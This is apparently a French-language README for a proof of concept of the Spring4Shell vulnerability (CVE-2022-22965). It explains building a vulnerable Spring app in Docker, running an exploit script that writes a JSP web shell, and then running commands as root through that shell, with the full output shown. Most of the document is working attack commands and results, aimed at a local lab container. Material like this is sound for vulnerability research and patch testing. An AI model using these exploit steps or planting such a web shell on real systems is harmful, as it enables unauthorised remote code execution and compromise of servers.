
CVE-2022-22965 (Spring4Shell) Preuve de concept

Une construction basée sur BuildKit est requise, vous devez donc l'activer.
Le moyen le plus simple est de définir la variable d'environnement DOCKER_BUILDKIT=1 lors de l'invocation de la commande docker build, par exemple :
$ DOCKER_BUILDKIT=1 docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core
Sinon, pour activer docker BuildKit par défaut, définissez la fonctionnalité de configuration du démon dans /etc/docker/daemon.json sur true et redémarrez le démon :
{ "features": { "buildkit": true } }
Ainsi, vous pouvez exécuter simplement
$ docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core
$ curl localhost:8080/spring4shell/exploitme
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Spring4Shell PoC Spring Application</title>
</head>
<body>
Hello World! Exploit me!
</body>
</html>
$ python3 exploit-core.py --url "http://localhost:8080/spring4shell/exploitme" --file shell
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id
Si tout s'est bien passé, exécutez des commandes arbitraires dans le conteneur via le port HTTP Tomcat, par exemple :
$ curl http://localhost:8080/shell.jsp\?cmd\=id --output -
uid=0(root) gid=0(root) groups=0(root)
//
$ curl http://localhost:8080/shell.jsp\?cmd\=whoami --output -
root
//
$ curl http://localhost:8080/shell.jsp\?cmd\=cat%20/etc/issue --output -
Debian GNU/Linux 11 \n \l
//